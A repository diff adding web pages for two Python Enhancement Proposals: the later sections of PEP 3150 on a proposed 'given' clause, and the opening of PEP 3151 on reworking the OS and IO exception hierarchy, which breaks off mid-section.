expr_stmt: testlist_star_expr (augassign (yield_expr|testlist) |
+             ('=' (yield_expr|testlist_star_expr))*)
+del_stmt: 'del' exprlist
+pass_stmt: 'pass'
+return_stmt: 'return' [testlist]
+yield_stmt: yield_expr
+raise_stmt: 'raise' [test ['from' test]]
+assert_stmt: 'assert' test [',' test]
+
+
+

New:

+
expr_stmt: testlist_star_expr (augassign (yield_expr|testlist) |
+             ('=' (yield_expr|testlist_star_expr))*) [given_clause]
+del_stmt: 'del' exprlist [given_clause]
+pass_stmt: 'pass' [given_clause]
+return_stmt: 'return' [testlist] [given_clause]
+yield_stmt: yield_expr [given_clause]
+raise_stmt: 'raise' [test ['from' test]] [given_clause]
+assert_stmt: 'assert' test [',' test] [given_clause]
+given_clause: "given" [(NAME '=' test)+ "in"]":" suite
+
+
+

(Note that expr_stmt in the grammar is a slight misnomer, as it covers +assignment and augmented assignment in addition to simple expression +statements)

+
+

Note

+

These proposed grammar changes don’t yet cover the forward reference +expression syntax for accessing names defined in the statement local +namespace.

+
+

The new clause is added as an optional element of the existing statements +rather than as a new kind of compound statement in order to avoid creating +an ambiguity in the grammar. It is applied only to the specific elements +listed so that nonsense like the following is disallowed:

+
break given:
+    a = b = 1
+
+import sys given:
+    a = b = 1
+
+
+

However, the precise Grammar change described above is inadequate, as it +creates problems for the definition of simple_stmt (which allows chaining of +multiple single line statements with “;” rather than “\n”).

+

So the above syntax change should instead be taken as a statement of intent. +Any actual proposal would need to resolve the simple_stmt parsing problem +before it could be seriously considered. This would likely require a +non-trivial restructuring of the grammar, breaking up small_stmt and +flow_stmt to separate the statements that potentially contain arbitrary +subexpressions and then allowing a single one of those statements with +a given clause at the simple_stmt level. Something along the lines of:

+
stmt: simple_stmt | given_stmt | compound_stmt
+simple_stmt: small_stmt (';' (small_stmt | subexpr_stmt))* [';'] NEWLINE
+small_stmt: (pass_stmt | flow_stmt | import_stmt |
+             global_stmt | nonlocal_stmt)
+flow_stmt: break_stmt | continue_stmt
+given_stmt: subexpr_stmt (given_clause |
+              (';' (small_stmt | subexpr_stmt))* [';']) NEWLINE
+subexpr_stmt: expr_stmt | del_stmt | flow_subexpr_stmt | assert_stmt
+flow_subexpr_stmt: return_stmt | raise_stmt | yield_stmt
+given_clause: "given" (NAME '=' test)* ":" suite
+
+
+

For reference, here are the current definitions at that level:

+
stmt: simple_stmt | compound_stmt
+simple_stmt: small_stmt (';' small_stmt)* [';'] NEWLINE
+small_stmt: (expr_stmt | del_stmt | pass_stmt | flow_stmt |
+             import_stmt | global_stmt | nonlocal_stmt | assert_stmt)
+flow_stmt: break_stmt | continue_stmt | return_stmt | raise_stmt | yield_stmt
+
+
+

In addition to the above changes, the definition of atom would be changed +to also allow ?. The restriction of this usage to statements with +an associated given clause would be handled by a later stage of the +compilation process (likely AST construction, which already enforces +other restrictions where the grammar is overly permissive in order to +simplify the initial parsing step).

+
+
+

New PEP 8 Guidelines

+

As discussed on python-ideas ([7], [9]), new PEP 8 guidelines would also need to be developed to provide appropriate direction on when to use the given clause over ordinary variable assignments.

+

Based on the similar guidelines already present for try statements, this +PEP proposes the following additions for given statements to the +“Programming Conventions” section of PEP 8:

+
    +
  • for code that could reasonably be factored out into a separate function, +but is not currently reused anywhere, consider using a given clause. +This clearly indicates which variables are being used only to define +subcomponents of another statement rather than to hold algorithm or +application state. This is an especially useful technique when +passing multi-line functions to operations which take callable +arguments.
  • +
  • keep given clauses concise. If they become unwieldy, either break +them up into multiple steps or else move the details into a separate +function.
  • +
+
+
+
+

Rationale

+

Function and class statements in Python have a unique property +relative to ordinary assignment statements: to some degree, they are +declarative. They present the reader of the code with some critical +information about a name that is about to be defined, before +proceeding on with the details of the actual definition in the +function or class body.

+

The name of the object being declared is the first thing stated +after the keyword. Other important information is also given the +honour of preceding the implementation details:

+
    +
  • decorators (which can greatly affect the behaviour of the created +object, and were placed ahead of even the keyword and name as a matter +of practicality more so than aesthetics)
  • +
  • the docstring (on the first line immediately following the header line)
  • +
  • parameters, default values and annotations for function definitions
  • +
  • parent classes, metaclass and optionally other details (depending on +the metaclass) for class definitions
  • +
+

This PEP proposes to make a similar declarative style available for +arbitrary assignment operations, by permitting the inclusion of a +“given” suite following any simple assignment statement:

+
TARGET = [TARGET2 = ... TARGETN =] EXPR given:
+    SUITE
+
+
+

By convention, code in the body of the suite should be oriented solely +towards correctly defining the assignment operation carried out in the +header line. The header line operation should also be adequately +descriptive (e.g. through appropriate choices of variable names) to +give a reader a reasonable idea of the purpose of the operation +without reading the body of the suite.

+

However, while they are the initial motivating use case, limiting this +feature solely to simple assignments would be overly restrictive. Once the +feature is defined at all, it would be quite arbitrary to prevent its use +for augmented assignments, return statements, yield expressions, +comprehensions and arbitrary expressions that may modify the +application state.

+

The given clause may also function as a more readable +alternative to some uses of lambda expressions and similar +constructs when passing one-off functions to operations +like sorted() or in callback based event-driven programming.

+

In module and class level code, the given clause will serve as a +clear and reliable replacement for usage of the del statement to keep +interim working variables from polluting the resulting namespace.

+

One potentially useful way to think of the proposed clause is as a middle +ground between conventional in-line code and separation of an +operation out into a dedicated function, just as an inline while loop may +eventually be factored out into a dedicated generator.

+
+
+

Design Discussion

+
+

Keyword Choice

+

This proposal initially used where based on the name of a similar +construct in Haskell. However, it has been pointed out that there +are existing Python libraries (such as Numpy [4]) that already use +where in the SQL query condition sense, making that keyword choice +potentially confusing.

+

While given may also be used as a variable name (and hence would be +deprecated using the usual __future__ dance for introducing +new keywords), it is associated much more strongly with the desired +“here are some extra variables this expression may use” semantics +for the new clause.

+

Reusing the with keyword has also been proposed. This has the +advantage of avoiding the addition of a new keyword, but also has +a high potential for confusion as the with clause and with +statement would look similar but do completely different things. +That way lies C++ and Perl :)

+
+
+

Relation to PEP 403

+

PEP 403 (General Purpose Decorator Clause) attempts to achieve the main +goals of this PEP using a less radical language change inspired by the +existing decorator syntax.

+

Despite having the same author, the two PEPs are in direct competition with +each other. PEP 403 represents a minimalist approach that attempts to achieve +useful functionality with a minimum of change from the status quo. This PEP +instead aims for a more flexible standalone statement design, which requires +a larger degree of change to the language.

+

Note that where PEP 403 is better suited to explaining the behaviour of +generator expressions correctly, this PEP is better able to explain the +behaviour of decorator clauses in general. Both PEPs support adequate +explanations for the semantics of container comprehensions.

+
+
+

Explaining Container Comprehensions and Generator Expressions

+

One interesting feature of the proposed construct is that it can be used as +a primitive to explain the scoping and execution order semantics of +container comprehensions:

+
seq2 = [x for y in seq if p(y) for x in y if q(x)]
+
+# would be equivalent to
+
+seq2 = ?.result given seq=seq:
+    result = []
+    for y in seq:
+        if p(y):
+            for x in y:
+                if q(x):
+                    result.append(x)
+
+
+

The important point in this expansion is that it explains why comprehensions +appear to misbehave at class scope: only the outermost iterator is evaluated +at class scope, while all predicates, nested iterators and value expressions +are evaluated inside a nested scope.

+

Note that, unlike PEP 403, the current version of this PEP cannot provide a precisely equivalent expansion for a generator expression. The closest it can get is to define an additional level of scoping:

+
seq2 = ?.g(seq) given:
+    def g(seq):
+        for y in seq:
+            if p(y):
+                for x in y:
+                    if q(x):
+                        yield x
+
+
+

This limitation could be remedied by permitting the given clause to be +a generator function, in which case ? would refer to a generator-iterator +object rather than a simple namespace:

+
seq2 = ? given seq=seq in:
+    for y in seq:
+        if p(y):
+            for x in y:
+                if q(x):
+                    yield x
+
+
+

However, this would make the meaning of “?” quite ambiguous, even more so +than is already the case for the meaning of def statements (which will +usually have a docstring indicating whether or not a function definition is +actually a generator)

+
+
+

Explaining Decorator Clause Evaluation and Application

+

The standard explanation of decorator clause evaluation and application +has to deal with the idea of hidden compiler variables in order to show +steps in their order of execution. The given statement allows a decorated +function definition like:

+
@classmethod
+def classname(cls):
+    return cls.__name__
+
+
+

To instead be explained as roughly equivalent to:

+
classname = ?.d1(classname) given:
+    d1 = classmethod
+    def classname(cls):
+        return cls.__name__
+
+
+
+
+

Anticipated Objections

+
+

Two Ways To Do It

+

A lot of code may now be written with values defined either before the +expression where they are used or afterwards in a given clause, creating +two ways to do it, perhaps without an obvious way of choosing between them.

+

On reflection, I feel this is a misapplication of the “one obvious way” +aphorism. Python already offers lots of ways to write code. We can use +a for loop or a while loop, a functional style or an imperative style or an +object oriented style. The language, in general, is designed to let people +write code that matches the way they think. Since different people think +differently, the way they write their code will change accordingly.

+

Such stylistic questions in a code base are rightly left to the development +group responsible for that code. When does an expression get so complicated +that the subexpressions should be taken out and assigned to variables, even +though those variables are only going to be used once? When should an inline +while loop be replaced with a generator that implements the same logic? +Opinions differ, and that’s OK.

+

However, explicit PEP 8 guidance will be needed for CPython and the standard +library, and that is discussed in the proposal above.

+
+
+

Out of Order Execution

+

The given clause makes execution jump around a little strangely, as the +body of the given clause is executed before the simple statement in the +clause header. The closest any other part of Python comes to this is the out +of order evaluation in list comprehensions, generator expressions and +conditional expressions and the delayed application of decorator functions to +the function they decorate (the decorator expressions themselves are executed +in the order they are written).

+

While this is true, the syntax is intended for cases where people are +themselves thinking about a problem out of sequence (at least as far as +the language is concerned). As an example of this, consider the following +thought in the mind of a Python user:

+
+
I want to sort the items in this sequence according to the values of +attr1 and attr2 on each item.
+

If they’re comfortable with Python’s lambda expressions, then they might +choose to write it like this:

+
sorted_list = sorted(original, key=(lambda v: (v.attr1, v.attr2)))
+
+
+

That gets the job done, but it hardly reaches the standard of executable +pseudocode that befits Python’s reputation.

+

If they don’t like lambda specifically, the operator module offers an +alternative that still allows the key function to be defined inline:

+
sorted_list = sorted(original,
+                     key=operator.attrgetter('attr1', 'attr2'))
+
+
+

Again, it gets the job done, but even the most generous of readers would +not consider that to be “executable pseudocode”.

+

If they think both of the above options are ugly and confusing, or they need +logic in their key function that can’t be expressed as an expression (such +as catching an exception), then Python currently forces them to reverse the +order of their original thought and define the sorting criteria first:

+
def sort_key(item):
+    return item.attr1, item.attr2
+
+sorted_list = sorted(original, key=sort_key)
+
+
+

“Just define a function” has been the rote response to requests for multi-line +lambda support for years. As with the above options, it gets the job done, +but it really does represent a break between what the user is thinking and +what the language allows them to express.

+

I believe the proposal in this PEP would finally let Python get close to the +“executable pseudocode” bar for the kind of thought expressed above:

+
sorted_list = sorted(original, key=?.key) given:
+    def key(item):
+        return item.attr1, item.attr2
+
+
+

Everything is in the same order as it was in the user’s original thought, and +they don’t even need to come up with a name for the sorting criteria: it is +possible to reuse the keyword argument name directly.

+

A possible enhancement to this proposal would be to provide a convenient +shorthand syntax to say “use the given clause contents as keyword +arguments”. Even without dedicated syntax, that can be written simply as +**vars(?).

+
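Even that fallback spelling can be approximated today; a rough sketch using types.SimpleNamespace to stand in for the namespace a given clause would create (the data and attribute names below are purely illustrative):

+
from types import SimpleNamespace
+
+def record(a, b):
+    return SimpleNamespace(attr1=a, attr2=b)
+
+original = [record(2, "x"), record(1, "y")]
+
+# The namespace contents become keyword arguments, as "**vars(?)" would:
+ns = SimpleNamespace(key=lambda v: (v.attr1, v.attr2), reverse=True)
+sorted_list = sorted(original, **vars(ns))
+
+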
+
+

Harmful to Introspection

+

Poking around in module and class internals is an invaluable tool for +white-box testing and interactive debugging. The given clause will be +quite effective at preventing access to temporary state used during +calculations (although no more so than current usage of del statements +in that regard).

+

While this is a valid concern, design for testability is an issue that +cuts across many aspects of programming. If a component needs to be tested +independently, then a given statement should be refactored into separate +statements so that information is exposed to the test suite. This isn’t +significantly different from refactoring an operation hidden inside a +function or generator out into its own function purely to allow it to be +tested in isolation.

+
+
+

Lack of Real World Impact Assessment

+

The examples in the current PEP are almost all relatively small “toy” +examples. The proposal in this PEP needs to be subjected to the test of +application to a large code base (such as the standard library or a large +Twisted application) in a search for examples where the readability of real +world code is genuinely enhanced.

+

This is more a deficiency in the PEP than in the idea, though. If +it wasn’t a real world problem, we wouldn’t get so many complaints about +the lack of multi-line lambda support, and Ruby’s block construct +probably wouldn’t be quite so popular.

+
+
+
+
+

Open Questions

+
+

Syntax for Forward References

+

The ? symbol is proposed for forward references to the given namespace +as it is short, currently unused and suggests “there’s something missing +here that will be filled in later”.

+

The proposal in the PEP doesn’t neatly parallel any existing Python feature, +so reusing an already used symbol has been deliberately avoided.

+
+
+

Handling of nonlocal and global

+

nonlocal and global are explicitly disallowed in the given clause +suite and will be syntax errors if they occur. They will work normally if +they appear within a def statement within that suite.

+

Alternatively, they could be defined as operating as if the anonymous +functions were defined as in the expansion above.

+
+
+

Handling of break and continue

+

break and continue will operate as if the anonymous functions were +defined as in the expansion above. They will be syntax errors if they occur +in the given clause suite but will work normally if they appear within +a for or while loop as part of that suite.

+
+
+

Handling of return and yield

+

return and yield are explicitly disallowed in the given clause +suite and will be syntax errors if they occur. They will work normally if +they appear within a def statement within that suite.

+
+
+
+

Examples

+

Defining callbacks for event driven programming:

+
# Current Python (definition before use)
+def cb(sock):
+    ... # Do something with socket
+def eb(exc):
+    logging.exception(
+        "Failed connecting to %s:%s", host, port)
+loop.create_connection((host, port), cb, eb)
+
+# Becomes:
+loop.create_connection((host, port), ?.cb, ?.eb) given:
+    def cb(sock):
+        ... # Do something with socket
+    def eb(exc):
+        logging.exception(
+            "Failed connecting to %s:%s", host, port)
+
+
+

Defining “one-off” classes which typically only have a single instance:

+
# Current Python (instantiation after definition)
+class public_name():
+  ... # However many lines
+public_name = public_name(*params)
+
+# Current Python (custom decorator)
+def singleton(*args, **kwds):
+    def decorator(cls):
+        return cls(*args, **kwds)
+    return decorator
+
+@singleton(*params)
+class public_name():
+  ... # However many lines
+
+# Becomes:
+public_name = ?.MeaningfulClassName(*params) given:
+  class MeaningfulClassName():
+    ... # Should trawl the stdlib for an example of doing this
+
+
+

Calculating attributes without polluting the local namespace (from os.py):

+
# Current Python (manual namespace cleanup)
+def _createenviron():
+  ... # 27 line function
+
+environ = _createenviron()
+del _createenviron
+
+# Becomes:
+environ = ?._createenviron() given:
+    def _createenviron():
+      ... # 27 line function
+
+
+

Replacing default argument hack (from functools.lru_cache):

+
# Current Python (default argument hack)
+def decorating_function(user_function,
+               tuple=tuple, sorted=sorted, len=len, KeyError=KeyError):
+  ... # 60 line function
+return decorating_function
+
+# Becomes:
+return ?.decorating_function given:
+  # Cell variables rather than locals, but should give similar speedup
+  tuple, sorted, len, KeyError = tuple, sorted, len, KeyError
+  def decorating_function(user_function):
+    ... # 60 line function
+
+# This example also nicely makes it clear that there is nothing in the
+# function after the nested function definition. Due to additional
+# nested functions, that isn't entirely clear in the current code.
+
+
+
+
+

Possible Additions

+
    +
  • The current proposal allows the addition of a given clause only +for simple statements. Extending the idea to allow the use of +compound statements would be quite possible (by appending the given +clause as an independent suite at the end), but doing so raises +serious readability concerns (as values defined in the given +clause may be used well before they are defined, exactly the kind +of readability trap that other features like decorators and with +statements are designed to eliminate)
  • +
  • The “explicit early binding” variant may be applicable to the discussions +on python-ideas on how to eliminate the default argument hack. A given +clause in the header line for functions (after the return type annotation) +may be the answer to that question.
  • +
+
+
+

Rejected Alternatives

+
    +
  • An earlier version of this PEP allowed implicit forward references to the +names in the trailing suite, and also used implicit early binding +semantics. Both of these ideas substantially complicated the proposal +without providing a sufficient increase in expressive power. The current +proposal, with explicit forward references and early binding, brings the +new construct into line with existing scoping semantics, greatly +improving the chances the idea can actually be implemented.
  • +
  • In addition to the proposals made here, there have also been suggestions +of two suite “in-order” variants which provide the limited scoping of +names without supporting out-of-order execution. I believe these +suggestions largely miss the point of what people are complaining about +when they ask for multi-line lambda support - it isn’t that coming up +with a name for the subexpression is especially difficult, it’s that +naming the function before the statement that uses it means the code +no longer matches the way the developer thinks about the problem at hand.
  • +
  • I’ve made some unpublished attempts to allow direct references to the +closure implicitly created by the given clause, while still retaining +the general structure of the syntax as defined in this PEP (For example, +allowing a subexpression like ?given or :given to be used in +expressions to indicate a direct reference to the implied closure, thus +preventing it from being called automatically to create the local namespace). +All such attempts have appeared unattractive and confusing compared to +the simpler decorator-inspired proposal in PEP 403.
  • +
+
+
+

Reference Implementation

+

None as yet. If you want a crash course in Python namespace +semantics and code compilation, feel free to try ;)

+
+
+

TO-DO

+
    +
  • Mention PEP 359 and possible uses for locals() in the given clause
  • +
  • Figure out if this can be used internally to make the implementation of +zero-argument super() calls less awful
  • +
+
+
+

References

+ + +
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-3150.rst

+

Last modified: 2023-10-11 12:05:51 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-3151/index.html b/pep-3151/index.html new file mode 100644 index 00000000000..af1e5fba977 --- /dev/null +++ b/pep-3151/index.html @@ -0,0 +1,1107 @@ + + PEP 3151 – Reworking the OS and IO exception hierarchy | peps.python.org
+
+


+ + +
+
+
+

PEP 3151 – Reworking the OS and IO exception hierarchy

+
+
Author:
+
Antoine Pitrou <solipsis at pitrou.net>
+
BDFL-Delegate:
+
Barry Warsaw
+
Status:
+
Final
+
Type:
+
Standards Track
+
Created:
+
21-Jul-2010
+
Python-Version:
+
3.3
+
Post-History:
+

+
Resolution:
+
Python-Dev message
+
+
+
+
+
+

Abstract

+

The standard exception hierarchy is an important part of the Python +language. It has two defining qualities: it is both generic and +selective. Generic in that the same exception type can be raised +- and handled - regardless of the context (for example, whether you are +trying to add something to an integer, to call a string method, or to write +an object on a socket, a TypeError will be raised for bad argument types). +Selective in that it allows the user to easily handle (silence, examine, +process, store or encapsulate…) specific kinds of error conditions +while letting other errors bubble up to higher calling contexts. For +example, you can choose to catch ZeroDivisionErrors without affecting +the default handling of other ArithmeticErrors (such as OverflowErrors).

+

This PEP proposes changes to a part of the exception hierarchy in +order to better embody the qualities mentioned above: the errors +related to operating system calls (OSError, IOError, mmap.error, +select.error, and all their subclasses).

+
+
+

Rationale

+ +
+

Lack of fine-grained exceptions

+

The current variety of OS-related exceptions doesn’t allow the user to filter +easily for the desired kinds of failures. As an example, consider the task +of deleting a file if it exists. The Look Before You Leap (LBYL) idiom +suffers from an obvious race condition:

+
if os.path.exists(filename):
+    os.remove(filename)
+
+
+

If a file named as filename is created by another thread or process +between the calls to os.path.exists and os.remove, it won’t be +deleted. This can produce bugs in the application, or even security issues.

+

Therefore, the solution is to try to remove the file, and ignore the error +if the file doesn’t exist (an idiom known as Easier to Ask Forgiveness +than to get Permission, or EAFP). Careful code will read like the following +(which works under both POSIX and Windows systems):

+
try:
+    os.remove(filename)
+except OSError as e:
+    if e.errno != errno.ENOENT:
+        raise
+
+
+

or even:

+
try:
+    os.remove(filename)
+except EnvironmentError as e:
+    if e.errno != errno.ENOENT:
+        raise
+
+
+

This is a lot more to type, and also forces the user to remember the various +cryptic mnemonics from the errno module. It imposes an additional +cognitive burden and gets tiresome rather quickly. Consequently, many +programmers will instead write the following code, which silences exceptions +too broadly:

+
try:
+    os.remove(filename)
+except OSError:
+    pass
+
+
+

os.remove can raise an OSError not only when the file doesn’t exist, +but in other possible situations (for example, the filename points to a +directory, or the current process doesn’t have permission to remove +the file), which all indicate bugs in the application logic and therefore +shouldn’t be silenced. What the programmer would like to write instead is +something such as:

+
try:
+    os.remove(filename)
+except FileNotFoundError:
+    pass
+
+
+
+
+
+

Compatibility strategy

+

Reworking the exception hierarchy will obviously change the exact semantics +of at least some existing code. While it is not possible to improve on the +current situation without changing exact semantics, it is possible to define +a narrower type of compatibility, which we will call useful compatibility.

+

For this we first must explain what we will call careful and careless +exception handling. Careless (or “naïve”) code is defined as code which +blindly catches any of OSError, IOError, socket.error, +mmap.error, WindowsError, select.error without checking the errno +attribute. This is because such exception types are much too broad to signify +anything. Any of them can be raised for error conditions as diverse as: a +bad file descriptor (which will usually indicate a programming error), an +unconnected socket (ditto), a socket timeout, a file type mismatch, an invalid +argument, a transmission failure, insufficient permissions, a non-existent +directory, a full filesystem, etc.

+

(moreover, the use of certain of these exceptions is irregular; Appendix B exposes the case of the select module, +which raises different exceptions depending on the implementation)

+

Careful code is defined as code which, when catching any of the above +exceptions, examines the errno attribute to determine the actual error +condition and takes action depending on it.

+

Then we can define useful compatibility as follows:

+
    +
  • useful compatibility doesn’t make exception catching any narrower, but +it can be broader for careless exception-catching code. Given the following +kind of snippet, all exceptions caught before this PEP will also be +caught after this PEP, but the reverse may be false (because the coalescing +of OSError, IOError and others means the except clause throws +a slightly broader net):
    try:
    +    ...
    +    os.remove(filename)
    +    ...
    +except OSError:
    +    pass
    +
    +
    +
  • +
  • useful compatibility doesn’t alter the behaviour of careful +exception-catching code. Given the following kind of snippet, the same +errors should be silenced or re-raised, regardless of whether this PEP +has been implemented or not:
    try:
    +    os.remove(filename)
    +except OSError as e:
    +    if e.errno != errno.ENOENT:
    +        raise
    +
    +
    +
  • +
+

The rationale for this compromise is that careless code can’t really be +helped, but at least code which “works” won’t suddenly raise errors and +crash. This is important since such code is likely to be present in +scripts used as cron tasks or automated system administration programs.

+

Careful code, on the other hand, should not be penalized. Actually, one +purpose of this PEP is to ease writing careful code.

+
+
+

Step 1: coalesce exception types

+

The first step of the resolution is to coalesce existing exception types. +The following changes are proposed:

+
    +
  • alias both socket.error and select.error to OSError
  • +
  • alias mmap.error to OSError
  • +
  • alias both WindowsError and VMSError to OSError
  • +
  • alias IOError to OSError
  • +
  • coalesce EnvironmentError into OSError
  • +
+

Each of these changes doesn’t preserve exact compatibility, but it does +preserve useful compatibility (see “compatibility” section above).

+

Each of these changes can be accepted or refused individually, but of course +it is considered that the greatest impact can be achieved if this first step +is accepted in full. In this case, the IO exception sub-hierarchy would +become:

+
+-- OSError   (replacing IOError, WindowsError, EnvironmentError, etc.)
+    +-- io.BlockingIOError
+    +-- io.UnsupportedOperation (also inherits from ValueError)
+    +-- socket.gaierror
+    +-- socket.herror
+    +-- socket.timeout
+
+
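As the Implementation section below notes, this step shipped with Python 3.3, so the coalescing can be verified interactively on any 3.3+ interpreter:

+
>>> import socket, select, mmap
+>>> IOError is OSError, EnvironmentError is OSError
+(True, True)
+>>> socket.error is OSError, select.error is OSError, mmap.error is OSError
+(True, True, True)
+
+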
+
+

Justification

+

Not only does this first step present the user a simpler landscape as +explained in the rationale section, but it also allows for a better +and more complete resolution of Step 2 (see Prerequisite).

+

The rationale for keeping OSError as the official name for generic +OS-related exceptions is that it, precisely, is more generic than IOError. +EnvironmentError is more tedious to type and also much lesser-known.

+

The survey in Appendix B shows that IOError is the +dominant error today in the standard library. As for third-party Python code, +Google Code Search shows IOError being ten times more popular than +EnvironmentError in user code, and three times more popular than OSError +[3]. However, with no intention to deprecate IOError in the middle +term, the lesser popularity of OSError is not a problem.

+
+
+

Exception attributes

+

Since WindowsError is coalesced into OSError, the latter gains a winerror +attribute under Windows. It is set to None under situations where it is not +meaningful, as is already the case with the errno, filename and +strerror attributes (for example when OSError is raised directly by +Python code).

+
+
+

Deprecation of names

+

The following paragraphs outline a possible deprecation strategy for +old exception names. However, it has been decided to keep them as aliases +for the time being. This decision could be revised in time for Python 4.0.

+
+

built-in exceptions

+

Deprecating the old built-in exceptions cannot be done in a straightforward +fashion by intercepting all lookups in the builtins namespace, since these +are performance-critical. We also cannot work at the object level, since +the deprecated names will be aliased to non-deprecated objects.

+

A solution is to recognize these names at compilation time, and +then emit a separate LOAD_OLD_GLOBAL opcode instead of the regular +LOAD_GLOBAL. This specialized opcode will handle the output of a +DeprecationWarning (or PendingDeprecationWarning, depending on the policy +decided upon) when the name doesn’t exist in the globals namespace, but +only in the builtins one. This will be enough to avoid false positives +(for example if someone defines their own OSError in a module), and +false negatives will be rare (for example when someone accesses OSError +through the builtins module rather than directly).

+
+
+

module-level exceptions

+

The above approach cannot be used easily, since it would require +special-casing some modules when compiling code objects. However, these +names are by construction much less visible (they don’t appear in the +builtins namespace), and lesser-known too, so we might decide to let them +live in their own namespaces.

+
+
+
+
+

Step 2: define additional subclasses

+

The second step of the resolution is to extend the hierarchy by defining +subclasses which will be raised, rather than their parent, for specific +errno values. Exactly which errno values are covered is subject to +discussion, but a survey of existing exception matching practices (see Appendix A) helps us propose a reasonable subset of all values. +Trying to map all errno mnemonics, indeed, seems foolish, pointless, +and would pollute the root namespace.

+

Furthermore, in a couple of cases, different errno values could raise +the same exception subclass. For example, EAGAIN, EALREADY, EWOULDBLOCK +and EINPROGRESS are all used to signal that an operation on a non-blocking +socket would block (and therefore needs trying again later). They could +therefore all raise an identical subclass and let the user examine the +errno attribute if (s)he so desires (see below “exception +attributes”).

+
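A small demonstration of this grouping as it shipped in Python 3.3+: reading from an empty non-blocking socket raises the single BlockingIOError type, while the precise errno remains available for the rare caller who needs it:

+
import errno, socket
+
+s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
+s.bind(("127.0.0.1", 0))
+s.setblocking(False)
+try:
+    s.recv(1024)   # no datagram is waiting, so this cannot succeed yet
+except BlockingIOError as e:
+    print(e.errno in (errno.EAGAIN, errno.EWOULDBLOCK))   # True
+finally:
+    s.close()
+
+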
+

Prerequisite

+

Step 1 is a loose prerequisite for this.

+

Prerequisite, because some errnos can currently be attached to different +exception classes: for example, ENOENT can be attached to both OSError and +IOError, depending on the context. If we don’t want to break useful +compatibility, we can’t make an except OSError (or IOError) fail to +match an exception where it would succeed today.

+

Loose, because we could decide for a partial resolution of step 2 +if existing exception classes are not coalesced: for example, ENOENT could +raise a hypothetical FileNotFoundError where an IOError was previously +raised, but continue to raise OSError otherwise.

+

The dependency on step 1 could be totally removed if the new subclasses +used multiple inheritance to match with all of the existing superclasses +(or, at least, OSError and IOError, which are arguably the most prevalent +ones). It would, however, make the hierarchy more complicated and +therefore harder to grasp for the user.

+
+
+

New exception classes

+

The following tentative list of subclasses, along with a description and +the list of errnos mapped to them, is submitted to discussion:

+
    +
  • FileExistsError: trying to create a file or directory which already +exists (EEXIST)
  • +
  • FileNotFoundError: for all circumstances where a file or directory is +requested but doesn’t exist (ENOENT)
  • +
  • IsADirectoryError: file-level operation (open(), os.remove()…) +requested on a directory (EISDIR)
  • +
  • NotADirectoryError: directory-level operation requested on something +else (ENOTDIR)
  • +
  • PermissionError: trying to run an operation without the adequate access +rights - for example filesystem permissions (EACCES, EPERM)
  • +
  • BlockingIOError: an operation would block on an object (e.g. socket) set +for non-blocking operation (EAGAIN, EALREADY, EWOULDBLOCK, EINPROGRESS); +this is the existing io.BlockingIOError with an extended role
  • +
  • BrokenPipeError: trying to write on a pipe while the other end has been +closed, or trying to write on a socket which has been shutdown for writing +(EPIPE, ESHUTDOWN)
  • +
  • InterruptedError: a system call was interrupted by an incoming signal +(EINTR)
  • +
  • ConnectionAbortedError: connection attempt aborted by peer (ECONNABORTED)
  • +
  • ConnectionRefusedError: connection attempt refused by peer (ECONNREFUSED)
  • +
  • ConnectionResetError: connection reset by peer (ECONNRESET)
  • +
  • TimeoutError: connection timed out (ETIMEDOUT); this can be re-cast +as a generic timeout exception, replacing socket.timeout and also useful +for other types of timeout (for example in Lock.acquire())
  • +
  • ChildProcessError: operation on a child process failed (ECHILD); +this is raised mainly by the wait() family of functions.
  • +
  • ProcessLookupError: the given process (as identified by, e.g., its +process id) doesn’t exist (ESRCH).
  • +
+

In addition, the following exception class is proposed for inclusion:

+
    +
  • ConnectionError: a base class for ConnectionAbortedError, +ConnectionRefusedError and ConnectionResetError
  • +
+

The following drawing tries to sum up the proposed additions, along with +the corresponding errno values (where applicable). The root of the +sub-hierarchy (OSError, assuming Step 1 is accepted in full) is not +shown:

+
+-- BlockingIOError        EAGAIN, EALREADY, EWOULDBLOCK, EINPROGRESS
++-- ChildProcessError                                          ECHILD
++-- ConnectionError
+    +-- BrokenPipeError                              EPIPE, ESHUTDOWN
+    +-- ConnectionAbortedError                           ECONNABORTED
+    +-- ConnectionRefusedError                           ECONNREFUSED
+    +-- ConnectionResetError                               ECONNRESET
++-- FileExistsError                                            EEXIST
++-- FileNotFoundError                                          ENOENT
++-- InterruptedError                                            EINTR
++-- IsADirectoryError                                          EISDIR
++-- NotADirectoryError                                        ENOTDIR
++-- PermissionError                                     EACCES, EPERM
++-- ProcessLookupError                                          ESRCH
++-- TimeoutError                                            ETIMEDOUT
+
+
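With the intermediate ConnectionError class, a single except clause covers refused, reset and aborted connections without any errno bookkeeping. A sketch of the intended usage (it assumes the freed port is not grabbed by another process in the meantime):

+
import socket
+
+with socket.socket() as probe:
+    probe.bind(("127.0.0.1", 0))     # grab a free port number...
+    port = probe.getsockname()[1]    # ...remember it, then release it on exit
+
+try:
+    socket.create_connection(("127.0.0.1", port), timeout=2)
+except ConnectionError as exc:       # catches ConnectionRefusedError et al.
+    print(type(exc).__name__, exc.errno)
+
+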
+
+
+

Naming

+

Various naming controversies can arise. One of them is whether all +exception class names should end in “Error”. In favour is consistency +with the rest of the exception hierarchy, against is concision (especially +with long names such as ConnectionAbortedError).

+
+
+

Exception attributes

+

In order to preserve useful compatibility, these subclasses should still +set adequate values for the various exception attributes defined on the +superclass (for example errno, filename, and optionally +winerror).

+
+
+

Implementation

+

Since it is proposed that the subclasses are raised based purely on the +value of errno, little or no changes should be required in extension +modules (either standard or third-party).

+

The first possibility is to adapt the PyErr_SetFromErrno() family +of functions (PyErr_SetFromWindowsErr() under Windows) to raise the +appropriate OSError subclass. This wouldn’t cover, however, Python +code raising OSError directly, using the following idiom (seen in +Lib/tempfile.py):

+
raise IOError(_errno.EEXIST, "No usable temporary file name found")
+
+
+

A second possibility, suggested by Marc-Andre Lemburg, is to adapt +OSError.__new__ to instantiate the appropriate subclass. This has +the benefit of also covering Python code such as the above.

+
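This second approach is the one that ended up in Python 3.3, and it is easy to check interactively:

+
>>> import errno
+>>> type(OSError(errno.EEXIST, "File exists"))
+<class 'FileExistsError'>
+>>> type(IOError(errno.ENOENT, "No such file or directory"))
+<class 'FileNotFoundError'>
+
+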
+
+
+

Possible objections

+
+

Namespace pollution

+

Making the exception hierarchy finer-grained makes the root (or builtins) +namespace larger. This is to be moderated, however, as:

+
    +
  • only a handful of additional classes are proposed;
  • +
